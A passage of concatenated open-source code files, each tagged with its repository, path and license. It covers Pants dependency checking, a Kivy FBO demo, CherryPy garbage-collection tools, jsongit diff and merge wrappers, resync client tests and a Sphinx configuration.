# TODO(Tejal Desai): pantsbuild/pants/65: Remove java_sources attribute for ScalaLibrary
if isinstance(target, ScalaLibrary):
for java_source in target.java_sources:
for src in java_source.sources_relative_to_buildroot():
targets_by_file[os.path.join(buildroot, src)].add(target)
# Compute class -> target.
with self._context.new_workunit(name='map_classes'):
classes_by_target = self._context.products.get_data('classes_by_target')
for tgt, target_products in classes_by_target.items():
for _, classes in target_products.abs_paths():
for cls in classes:
targets_by_file[cls].add(tgt)
# Compute jar -> target.
with self._context.new_workunit(name='map_jars'):
with IvyTaskMixin.symlink_map_lock:
all_symlinks_map = self._context.products.get_data('ivy_resolve_symlink_map').copy()
# We make a copy, so it's safe to use outside the lock.
def register_transitive_jars_for_ref(ivyinfo, ref):
deps_by_ref_memo = {}
def get_transitive_jars_by_ref(ref1):
def create_collection(current_ref):
return {ivyinfo.modules_by_ref[current_ref].artifact}
return ivyinfo.traverse_dependency_graph(ref1, create_collection, memo=deps_by_ref_memo)
target_key = (ref.org, ref.name)
if target_key in jarlibs_by_id:
# These targets provide all the jars in ref, and all the jars ref transitively depends on.
jarlib_targets = jarlibs_by_id[target_key]
for jar_path in get_transitive_jars_by_ref(ref):
# Register that each jarlib_target provides jar (via all its symlinks).
symlink = all_symlinks_map.get(os.path.realpath(jar_path), None)
if symlink:
for jarlib_target in jarlib_targets:
targets_by_file[symlink].add(jarlib_target)
ivy_products = self._context.products.get_data('ivy_jar_products')
if ivy_products:
for ivyinfos in ivy_products.values():
for ivyinfo in ivyinfos:
for ref in ivyinfo.modules_by_ref:
register_transitive_jars_for_ref(ivyinfo, ref)
return targets_by_file
def _compute_transitive_deps_by_target(self):
"""Map from target to all the targets it depends on, transitively."""
# Sort from least to most dependent.
sorted_targets = reversed(sort_targets(self._context.targets()))
transitive_deps_by_target = defaultdict(set)
# Iterate in dep order, to accumulate the transitive deps for each target.
for target in sorted_targets:
transitive_deps = set()
for dep in target.dependencies:
transitive_deps.update(transitive_deps_by_target.get(dep, []))
transitive_deps.add(dep)
# Need to handle the case where a java_sources target has dependencies.
# In particular if it depends back on the original target.
if hasattr(target, 'java_sources'):
for java_source_target in target.java_sources:
for transitive_dep in java_source_target.dependencies:
transitive_deps_by_target[java_source_target].add(transitive_dep)
transitive_deps_by_target[target] = transitive_deps
return transitive_deps_by_target
def check(self, srcs, actual_deps):
"""Check for missing deps.
See docstring for _compute_missing_deps for details.
"""
if self._check_missing_deps or self._check_missing_direct_deps or self._check_unnecessary_deps:
missing_file_deps, missing_tgt_deps, missing_direct_tgt_deps = \
self._compute_missing_deps(srcs, actual_deps)
buildroot = get_buildroot()
def shorten(path): # Make the output easier to read.
if path.startswith(buildroot):
return os.path.relpath(path, buildroot)
return path
def filter_whitelisted(missing_deps):
# Removing any targets that exist in the whitelist from the list of dependency issues.
return [(tgt_pair, evidence) for (tgt_pair, evidence) in missing_deps
if tgt_pair[0].address.reference() not in self._target_whitelist]
missing_tgt_deps = filter_whitelisted(missing_tgt_deps)
if self._check_missing_deps and (missing_file_deps or missing_tgt_deps):
for (tgt_pair, evidence) in missing_tgt_deps:
evidence_str = '\n'.join([' {} uses {}'.format(shorten(e[0]), shorten(e[1]))
for e in evidence])
self._context.log.error(
'Missing BUILD dependency {} -> {} because:\n{}'
.format(tgt_pair[0].address.reference(), tgt_pair[1].address.reference(), evidence_str))
for (src_tgt, dep) in missing_file_deps:
self._context.log.error('Missing BUILD dependency {} -> {}'
.format(src_tgt.address.reference(), shorten(dep)))
if self._check_missing_deps == 'fatal':
raise TaskError('Missing deps.')
missing_direct_tgt_deps = filter_whitelisted(missing_direct_tgt_deps)
if self._check_missing_direct_deps and missing_direct_tgt_deps:
for (tgt_pair, evidence) in missing_direct_tgt_deps:
evidence_str = '\n'.join([' {} uses {}'.format(shorten(e[0]), shorten(e[1]))
for e in evidence])
self._context.log.warn('Missing direct BUILD dependency {} -> {} because:\n{}'
.format(tgt_pair[0].address, tgt_pair[1].address, evidence_str))
if self._check_missing_direct_deps == 'fatal':
raise TaskError('Missing direct deps.')
if self._check_unnecessary_deps:
raise TaskError('Unnecessary dep warnings not implemented yet.')
def _compute_missing_deps(self, srcs, actual_deps):
"""Computes deps that are used by the compiler but not specified in a BUILD file.
These deps are bugs waiting to happen: the code may happen to compile because the dep was
brought in some other way (e.g., by some other root target), but that is obviously fragile.
Note that in practice we're OK with reliance on indirect deps that are only brought in
transitively. E.g., in Scala type inference can bring in such a dep subtly. Fortunately these
cases aren't as fragile as a completely missing dependency. It's still a good idea to have
explicit direct deps where relevant, so we optionally warn about indirect deps, to make them
easy to find and reason about.
- actual_deps: a map src -> list of actual deps (source, class or jar file) as noted by the
compiler.
Returns a triple (missing_file_deps, missing_tgt_deps, missing_direct_tgt_deps) where:
- missing_file_deps: a list of pairs (src_tgt, dep_file) where src_tgt requires dep_file, and
we're unable to map to a target (because its target isn't in the total set of targets in play,
and we don't want to parse every BUILD file in the workspace just to find it).
- missing_tgt_deps: a list of pairs (src_tgt, dep_tgt) where src_tgt is missing a necessary
transitive dependency on dep_tgt.
- missing_direct_tgt_deps: a list of pairs (src_tgt, dep_tgt) where src_tgt is missing a direct
dependency on dep_tgt but has a transitive dep on it.
All paths in the input and output are absolute.
"""
def must_be_explicit_dep(dep):
# We don't require explicit deps on the java runtime, so we shouldn't consider that
# a missing dep.
return not dep.startswith(self._context.java_home)
def target_or_java_dep_in_targets(target, targets):
# We want to check if the target is in the targets collection
#
# However, for the special case of scala_library that has a java_sources
# reference we're ok if that exists in targets even if the scala_library does not.
if target in targets:
return True
elif target.is_scala:
return any(t in targets for t in target.java_sources)
else:
return False
# TODO: If recomputing these every time becomes a performance issue, memoize for
# already-seen targets and incrementally compute for new targets not seen in a previous
# partition, in this or a previous chunk.
targets_by_file = self._compute_targets_by_file()
transitive_deps_by_target = self._compute_transitive_deps_by_target()
# Find deps that are actual but not specified.
with self._context.new_workunit(name='scan_deps'):
missing_file_deps = OrderedSet() # (src, src).
missing_tgt_deps_map = defaultdict(list) # (tgt, tgt) -> a list of (src, src) as evidence.
missing_direct_tgt_deps_map = defaultdict(list) # The same, but for direct deps.
buildroot = get_buildroot()
abs_srcs = [os.path.join(buildroot, src) for src in srcs]
for src in abs_srcs:
src_tgt = next(iter(targets_by_file.get(src)))
if src_tgt is not None:
for actual_dep in filter(must_be_explicit_dep, actual_deps.get(src, [])):
actual_dep_tgts = targets_by_file.get(actual_dep)
# actual_dep_tgts is usually a singleton. If it's not, we only need one of these
# to be in our declared deps to be OK.
if actual_dep_tgts is None:
missing_file_deps.add((src_tgt, actual_dep))
elif not target_or_java_dep_in_targets(src_tgt, actual_dep_tgts):
# Obviously intra-target deps are fine.
canonical_actual_dep_tgt = next(iter(actual_dep_tgts))
if actual_dep_tgts.isdisjoint(transitive_deps_by_target.get(src_tgt, [])):
missing_tgt_deps_map[(src_tgt, canonical_actual_dep_tgt)].append((src, actual_dep))
elif canonical_actual_dep_tgt not in src_tgt.dependencies:
# The canonical dep is the only one a direct dependency makes sense on.
missing_direct_tgt_deps_map[(src_tgt, canonical_actual_dep_tgt)].append(
(src, actual_dep))
else:
raise TaskError('Requested dep info for unknown source file: {}'.format(src))
return (list(missing_file_deps),
missing_tgt_deps_map.items(),
missing_direct_tgt_deps_map.items())
| apache-2.0 |
CuriousLearner/kivy | examples/canvas/fbo_canvas.py | 59 | 2544 | '''
FBO Canvas
==========
This demonstrates a layout using an FBO (Frame Buffer Off-screen)
instead of a plain canvas. You should see a black canvas with a
button labelled 'FBO' in the bottom left corner. Clicking it
animates the button moving right to left.
'''
__all__ = ('FboFloatLayout', )
from kivy.graphics import Color, Rectangle, Canvas, ClearBuffers, ClearColor
from kivy.graphics.fbo import Fbo
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ObjectProperty, NumericProperty
from kivy.app import App
from kivy.core.window import Window
from kivy.animation import Animation
from kivy.factory import Factory
class FboFloatLayout(FloatLayout):
texture = ObjectProperty(None, allownone=True)
alpha = NumericProperty(1)
def __init__(self, **kwargs):
self.canvas = Canvas()
with self.canvas:
self.fbo = Fbo(size=self.size)
self.fbo_color = Color(1, 1, 1, 1)
self.fbo_rect = Rectangle()
with self.fbo:
ClearColor(0, 0, 0, 0)
ClearBuffers()
# wait that all the instructions are in the canvas to set texture
self.texture = self.fbo.texture
super(FboFloatLayout, self).__init__(**kwargs)
def add_widget(self, *largs):
# trick to attach graphics instruction to fbo instead of canvas
canvas = self.canvas
self.canvas = self.fbo
ret = super(FboFloatLayout, self).add_widget(*largs)
self.canvas = canvas
return ret
def remove_widget(self, *largs):
canvas = self.canvas
self.canvas = self.fbo
super(FboFloatLayout, self).remove_widget(*largs)
self.canvas = canvas
def on_size(self, instance, value):
self.fbo.size = value
self.texture = self.fbo.texture
self.fbo_rect.size = value
def on_pos(self, instance, value):
self.fbo_rect.pos = value
def on_texture(self, instance, value):
self.fbo_rect.texture = value
def on_alpha(self, instance, value):
self.fbo_color.rgba = (1, 1, 1, value)
class ScreenLayerApp(App):
def build(self):
f = FboFloatLayout()
b = Factory.Button(text="FBO", size_hint=(None, None))
f.add_widget(b)
def anim_btn(*args):
if b.pos[0] == 0:
Animation(x=f.width - b.width).start(b)
else:
Animation(x=0).start(b)
b.bind(on_press=anim_btn)
return f
if __name__ == "__main__":
ScreenLayerApp().run()
| mit |
pgiraud/georchestra | extractorapp/jsbuild/util/gen-go-jstools.py | 24 | 1441 | #!/usr/bin/env python
"""Generate go-jstools.py"""
import sys
import textwrap
import virtualenv
filename = 'go-jstools.py'
after_install = """\
import os, subprocess
def after_install(options, home_dir):
etc = join(home_dir, 'etc')
## TODO: this should all come from distutils
## like distutils.sysconfig.get_python_inc()
if sys.platform == 'win32':
lib_dir = join(home_dir, 'Lib')
bin_dir = join(home_dir, 'Scripts')
elif is_jython:
lib_dir = join(home_dir, 'Lib')
bin_dir = join(home_dir, 'bin')
else:
lib_dir = join(home_dir, 'lib', py_version)
bin_dir = join(home_dir, 'bin')
if not os.path.exists(etc):
os.makedirs(etc)
subprocess.call([join(bin_dir, 'easy_install'), 'JSTools==%s'])
"""
def generate(filename, version):
# what's commented out below comes from go-pylons.py
#path = version
#if '==' in version:
# path = version[:version.find('==')]
#output = virtualenv.create_bootstrap_script(
# textwrap.dedent(after_install % (path, version)))
output = virtualenv.create_bootstrap_script(
textwrap.dedent(after_install % version))
fp = open(filename, 'w')
fp.write(output)
fp.close()
def main():
if len(sys.argv) != 2:
print >> sys.stderr, 'usage: %s version' % sys.argv[0]
sys.exit(1)
generate(filename, sys.argv[1])
if __name__ == '__main__':
main()
| gpl-3.0 |
boompieman/iim_project | project_python2/lib/python2.7/site-packages/pattern/server/cherrypy/cherrypy/lib/gctools.py | 40 | 7396 | import gc
import inspect
import os
import sys
import time
try:
import objgraph
except ImportError:
objgraph = None
import cherrypy
from cherrypy import _cprequest, _cpwsgi
from cherrypy.process.plugins import SimplePlugin
class ReferrerTree(object):
"""An object which gathers all referrers of an object to a given depth."""
peek_length = 40
def __init__(self, ignore=None, maxdepth=2, maxparents=10):
self.ignore = ignore or []
self.ignore.append(inspect.currentframe().f_back)
self.maxdepth = maxdepth
self.maxparents = maxparents
def ascend(self, obj, depth=1):
"""Return a nested list containing referrers of the given object."""
depth += 1
parents = []
# Gather all referrers in one step to minimize
# cascading references due to repr() logic.
refs = gc.get_referrers(obj)
self.ignore.append(refs)
if len(refs) > self.maxparents:
return [("[%s referrers]" % len(refs), [])]
try:
ascendcode = self.ascend.__code__
except AttributeError:
ascendcode = self.ascend.im_func.func_code
for parent in refs:
if inspect.isframe(parent) and parent.f_code is ascendcode:
continue
if parent in self.ignore:
continue
if depth <= self.maxdepth:
parents.append((parent, self.ascend(parent, depth)))
else:
parents.append((parent, []))
return parents
def peek(self, s):
"""Return s, restricted to a sane length."""
if len(s) > (self.peek_length + 3):
half = self.peek_length // 2
return s[:half] + '...' + s[-half:]
else:
return s
def _format(self, obj, descend=True):
"""Return a string representation of a single object."""
if inspect.isframe(obj):
filename, lineno, func, context, index = inspect.getframeinfo(obj)
return "<frame of function '%s'>" % func
if not descend:
return self.peek(repr(obj))
if isinstance(obj, dict):
return "{" + ", ".join(["%s: %s" % (self._format(k, descend=False),
self._format(v, descend=False))
for k, v in obj.items()]) + "}"
elif isinstance(obj, list):
return "[" + ", ".join([self._format(item, descend=False)
for item in obj]) + "]"
elif isinstance(obj, tuple):
return "(" + ", ".join([self._format(item, descend=False)
for item in obj]) + ")"
r = self.peek(repr(obj))
if isinstance(obj, (str, int, float)):
return r
return "%s: %s" % (type(obj), r)
def format(self, tree):
"""Return a list of string reprs from a nested list of referrers."""
output = []
def ascend(branch, depth=1):
for parent, grandparents in branch:
output.append((" " * depth) + self._format(parent))
if grandparents:
ascend(grandparents, depth + 1)
ascend(tree)
return output
def get_instances(cls):
return [x for x in gc.get_objects() if isinstance(x, cls)]
class RequestCounter(SimplePlugin):
def start(self):
self.count = 0
def before_request(self):
self.count += 1
def after_request(self):
self.count -=1
request_counter = RequestCounter(cherrypy.engine)
request_counter.subscribe()
def get_context(obj):
if isinstance(obj, _cprequest.Request):
return "path=%s;stage=%s" % (obj.path_info, obj.stage)
elif isinstance(obj, _cprequest.Response):
return "status=%s" % obj.status
elif isinstance(obj, _cpwsgi.AppResponse):
return "PATH_INFO=%s" % obj.environ.get('PATH_INFO', '')
elif hasattr(obj, "tb_lineno"):
return "tb_lineno=%s" % obj.tb_lineno
return ""
class GCRoot(object):
"""A CherryPy page handler for testing reference leaks."""
classes = [(_cprequest.Request, 2, 2,
"Should be 1 in this request thread and 1 in the main thread."),
(_cprequest.Response, 2, 2,
"Should be 1 in this request thread and 1 in the main thread."),
(_cpwsgi.AppResponse, 1, 1,
"Should be 1 in this request thread only."),
]
def index(self):
return "Hello, world!"
index.exposed = True
def stats(self):
output = ["Statistics:"]
for trial in range(10):
if request_counter.count > 0:
break
time.sleep(0.5)
else:
output.append("\nNot all requests closed properly.")
# gc_collect isn't perfectly synchronous, because it may
# break reference cycles that then take time to fully
# finalize. Call it thrice and hope for the best.
gc.collect()
gc.collect()
unreachable = gc.collect()
if unreachable:
if objgraph is not None:
final = objgraph.by_type('Nondestructible')
if final:
objgraph.show_backrefs(final, filename='finalizers.png')
trash = {}
for x in gc.garbage:
trash[type(x)] = trash.get(type(x), 0) + 1
if trash:
output.insert(0, "\n%s unreachable objects:" % unreachable)
trash = [(v, k) for k, v in trash.items()]
trash.sort()
for pair in trash:
output.append(" " + repr(pair))
# Check declared classes to verify uncollected instances.
# These don't have to be part of a cycle; they can be
# any objects that have unanticipated referrers that keep
# them from being collected.
allobjs = {}
for cls, minobj, maxobj, msg in self.classes:
allobjs[cls] = get_instances(cls)
for cls, minobj, maxobj, msg in self.classes:
objs = allobjs[cls]
lenobj = len(objs)
if lenobj < minobj or lenobj > maxobj:
if minobj == maxobj:
output.append(
"\nExpected %s %r references, got %s." %
(minobj, cls, lenobj))
else:
output.append(
"\nExpected %s to %s %r references, got %s." %
(minobj, maxobj, cls, lenobj))
for obj in objs:
if objgraph is not None:
ig = [id(objs), id(inspect.currentframe())]
fname = "graph_%s_%s.png" % (cls.__name__, id(obj))
objgraph.show_backrefs(
obj, extra_ignore=ig, max_depth=4, too_many=20,
filename=fname, extra_info=get_context)
output.append("\nReferrers for %s (refcount=%s):" %
(repr(obj), sys.getrefcount(obj)))
t = ReferrerTree(ignore=[objs], maxdepth=3)
tree = t.ascend(obj)
output.extend(t.format(tree))
return "\n".join(output)
stats.exposed = True
| gpl-3.0 |
mohitsethi/packstack | packstack/installer/exceptions.py | 13 | 1622 | # -*- coding: utf-8 -*-
__all__ = (
'PackStackError',
'InstallError',
'FlagValidationError',
'MissingRequirements',
'PluginError',
'ParamProcessingError',
'ParamValidationError',
'NetworkError',
'ScriptRuntimeError',
)
class PackStackError(Exception):
"""Default Exception class for packstack installer."""
def __init__(self, *args, **kwargs):
super(PackStackError, self).__init__(*args)
self.stdout = kwargs.get('stdout', None)
self.stderr = kwargs.get('stderr', None)
class PuppetError(Exception):
"""Raised when Puppet will have some problems."""
class MissingRequirements(PackStackError):
"""Raised when minimum install requirements are not met."""
pass
class InstallError(PackStackError):
"""Exception for generic errors during setup run."""
pass
class FlagValidationError(InstallError):
"""Raised when single flag validation fails."""
pass
class ParamValidationError(InstallError):
"""Raised when parameter value validation fails."""
pass
class PluginError(PackStackError):
pass
class ParamProcessingError(PluginError):
pass
class NetworkError(PackStackError):
"""Should be used for packstack's network failures."""
pass
class ScriptRuntimeError(PackStackError):
"""
Raised when utils.ScriptRunner.execute does not end successfully.
"""
pass
class ExecuteRuntimeError(PackStackError):
"""Raised when utils.execute does not end successfully."""
class SequenceError(PackStackError):
"""Exception for errors during setup sequence run."""
pass
| apache-2.0 |
texcaltech/windmilltownhomes-old | django/core/mail/backends/base.py | 660 | 1164 | """Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least overwrite send_messages().
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overwritten by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError
| bsd-3-clause |
talos/jsongit | jsongit/wrappers.py | 1 | 9151 | # -*- coding: utf-8 -*-
"""
jsongit.wrappers
These classes provide limited interfaces to pygit2 and json_diff constructs.
"""
import json_diff
import itertools
import copy
class Commit(object):
"""A wrapper around :class:`pygit2.Commit` linking to a single key in the
repo.
"""
def __init__(self, repo, key, data, pygit2_commit):
self._commit = pygit2_commit
self._repo = repo
self._key = key
self._data = data
def __eq__(self, other):
return self.oid == other.oid
def __str__(self):
return "'%s'='%s'@%s" % (self.key, self.data, self.hex[0:10])
def __repr__(self):
return "%s(%s,message=%s,author=%s)" % (type(self).__name__,
self.__str__(), self.message,
self.author)
@property
def data(self):
"""
:returns: the data associated with this commit.
:rtype: Boolean, Number, None, String, Dict, or List
"""
return self._data
@property
def key(self):
"""
:returns: the key associated with this commit.
:rtype: string
"""
return self._key
@property
def oid(self):
"""
:returns: The unique 20-byte ID of this Commit.
:rtype: string
"""
return self._commit.oid
@property
def hex(self):
"""
:returns: The unique 40-character hex representation of this commit's ID.
:rtype: string
"""
return self._commit.hex
@property
def message(self):
"""
:returns: The message associated with this commit.
:rtype: string
"""
return self._commit.message
@property
def author(self):
"""
:returns: The author of this commit.
:rtype: :class:`pygit2.Signature`
"""
return self._commit.author
@property
def committer(self):
"""
:returns: The committer of this commit.
:rtype: :class:`pygit2.Signature`
"""
return self._commit.committer
@property
def time(self):
"""
:returns: The time of this commit.
:rtype: long
"""
return self._commit.commit_time
@property
def repo(self):
"""
:returns: The repository of this commit.
:rtype: :class:`Repository <jsongit.models.Repository>`
"""
return self._repo
class DiffWrapper(object):
"""An internal wrapper for :mod:`json_diff`.
"""
def __init__(self, diff):
if Diff.is_json_diff(diff):
# wrap recursive updates
if Diff.UPDATE in diff:
update = diff[Diff.UPDATE]
for k, v in update.iteritems():
update[k] = DiffWrapper(v)
self._replace = None
else:
self._replace = diff
diff = {} if diff is None else diff
self._diff = diff
def __str__(self):
return self._diff.__str__()
def __repr__(self):
return "%s(%s)" % (type(self).__name__, self._diff.__repr__())
def __getitem__(self, k):
return self._diff[k]
def __eq__(self, other):
return self._diff == other
@property
def remove(self):
"""A dict of removed keys and their values.
"""
return self._diff.get(Diff.REMOVE)
@property
def update(self):
"""A DiffWrapper
"""
return self._diff.get(Diff.UPDATE)
@property
def append(self):
"""A dict of appended keys and their values.
"""
return self._diff.get(Diff.APPEND)
@property
def replace(self):
"""The diff is simply to replace wholesale.
"""
return self._replace
def apply(self, original):
"""Return an object modified with the changes in this diff.
:param original: the object to apply the diff to.
:type original: list, dict, number, or string
:returns: the modified object
:rtype: list, dict, number, or string
"""
if self.replace:
return self.replace
else:
obj = copy.copy(original)
for k, v in (self.remove or {}).iteritems():
obj.pop(k)
for k, v in (self.update or {}).iteritems():
# Recursive application
obj[k] = v.apply(obj[k])
for k, v in (self.append or {}).iteritems():
if hasattr(obj, 'insert'):
obj.insert(k, v)
else:
obj[k] = v
return obj
class Diff(DiffWrapper):
"""A class to encapsulate differences between two JSON git objects.
"""
APPEND = '_append'
REMOVE = '_remove'
UPDATE = '_update'
@classmethod
def is_json_diff(cls, obj):
"""Determine whether a dict was produced by JSON diff.
"""
if isinstance(obj, dict):
return any(k in obj for k in [cls.APPEND, cls.REMOVE, cls.UPDATE])
else:
return False
def __init__(self, obj1, obj2):
if isinstance(obj2, obj1.__class__):
c = json_diff.Comparator()
c.obj1 = obj1
c.obj2 = obj2
diff = c._compare_elements(obj1, obj2)
super(Diff, self).__init__(diff)
else:
# if types differ we just replace
super(Diff, self).__init__(obj2)
class Conflict(object):
"""A class wrapper for the conflict between two diffs.
"""
def __init__(self, diff1, diff2):
self._conflict = {}
if diff1.replace or diff2.replace:
if diff1.replace != diff2.replace:
self._conflict = {'replace': (diff1.replace, diff2.replace)}
else:
for verb1, verb2 in itertools.product(['append', 'update', 'remove'],
repeat=2):
mod1 = getattr(diff1, verb1) or {}
mod2 = getattr(diff2, verb2) or {}
# Isolate simultaneously modified keys
for k in (k for k in mod1 if k in mod2):
self._conflict.setdefault(verb1, {})
# If verbs were the same, it's OK unless mod was different.
if verb1 == verb2 and mod1[k] != mod2[k]:
self._conflict[verb1][k] = (mod1[k], mod2[k])
# Otherwise, it's a conflict no matter what
else:
self._conflict[verb1][k] = (mod1[k], None)
self._conflict.setdefault(verb2, {})
self._conflict[verb2][k] = (None, mod2[k])
def __nonzero__(self):
return len(self._conflict) != 0
def __str__(self):
return self._conflict.__str__()
def __repr__(self):
return "%s(%s)" % (type(self).__name__, self._conflict.__repr__())
@property
def remove(self):
"""A dict of key removal conflict tuples.
"""
return self._conflict.get('remove')
@property
def update(self):
"""A dict of key update conflict tuples.
"""
return self._conflict.get('update')
@property
def append(self):
"""A dict of key append conflict tuples.
"""
return self._conflict.get('append')
@property
def replace(self):
"""A tuple of the two diffs.
"""
return self._conflict.get('replace')
class Merge(object):
"""A class wrapper for the results of a merge operation.
"""
def __init__(self, success, original, merged, message, result=None,
conflict=None):
self._success = success
self._message = message
self._original = original
self._merged = merged
self._conflict = conflict
self._result = result
def __str__(self):
return self.message
def __repr__(self):
return "%s(success=%s,message=%s,conflict=%s,original=%s,merged=%s)" % (
type(self).__name__, self.success, self.message, self.conflict,
self.original, self.merged)
def __nonzero__(self):
return self.success
@property
def result(self):
"""
:returns:
the object resulting from this merge, or None if there was
a conflict.
"""
return self._result
@property
def success(self):
"""Whether the merge was a success.
"""
return self._success
@property
def original(self):
"""The original object.
"""
return self._original
@property
def merged(self):
"""The object that was merged in.
"""
return self._merged
@property
def conflict(self):
"""The :class:`Conflict <jsongit.wrappers.Conflict>`, if the merge
was not a success.
"""
return self._conflict
@property
def message(self):
"""The message associated with this merge.
"""
return self._message
| bsd-3-clause |
lindareijnhoudt/resync | resync/test/test_client_utils.py | 2 | 2589 | import unittest
from resync.client_utils import count_true_args,parse_links,parse_link,parse_capabilities,parse_capability_lists
from resync.client import ClientFatalError
class TestClientUtils(unittest.TestCase):
def test01_count_true_args(self):
self.assertEqual( count_true_args(), 0 )
self.assertEqual( count_true_args(True), 1 )
self.assertEqual( count_true_args(False), 0 )
self.assertEqual( count_true_args(0,1,2,3), 3 )
def test02_parse_links(self):
self.assertEqual( parse_links( [] ), [] )
self.assertEqual( parse_links( ['u,h'] ), [{'href': 'h', 'rel': 'u'}] )
self.assertEqual( parse_links( ['u,h','v,i'] ), [{'href': 'h', 'rel': 'u'},{'href': 'i', 'rel': 'v'}] )
self.assertRaises( ClientFatalError, parse_links, 'xx' )
self.assertRaises( ClientFatalError, parse_links, ['u'] )
self.assertRaises( ClientFatalError, parse_links, ['u,h','u'] )
def test03_parse_link(self):
# Input string of the form: rel,href,att1=val1,att2=val2
self.assertEqual( parse_link('u,h'), {'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b'), {'a': 'b', 'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b,c=d'), {'a': 'b', 'c': 'd', 'href': 'h', 'rel': 'u'} )
self.assertEqual( parse_link('u,h,a=b,a=d'), {'a': 'd', 'href': 'h', 'rel': 'u'} ) # desired??
self.assertRaises( ClientFatalError, parse_link, '' )
self.assertRaises( ClientFatalError, parse_link, 'u' )
self.assertRaises( ClientFatalError, parse_link, 'u,' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,,' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a=' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a=b,=c' )
def test04_parse_capabilities(self):
# Input string of the form: cap_name=uri,cap_name=uri
self.assertRaises( ClientFatalError, parse_capabilities, 'a' )
#self.assertRaises( ClientFatalError, parse_capabilities, 'a=' )
self.assertRaises( ClientFatalError, parse_capabilities, 'a=b,' )
#self.assertRaises( ClientFatalError, parse_capabilities, 'a=b,c=' )
def test05_parse_capability_lists(self):
# Input string of the form: uri,uri
self.assertEqual( parse_capability_lists('a,b'), ['a','b'] )
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestClientUtils)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
junkoda/fs2 | doc/conf.py | 1 | 10050 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# fs documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 5 18:48:51 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
'sphinx.ext.githubpages',
'sphinx.ext.autodoc', 'sphinx.ext.napoleon',
]
# Add any Sphinx extension module names here, as strings
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'fs'
copyright = '2016, Jun Koda'
author = 'Jun Koda'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0'
# The full version, including alpha/beta/rc tags.
release = '0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'fs v0.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
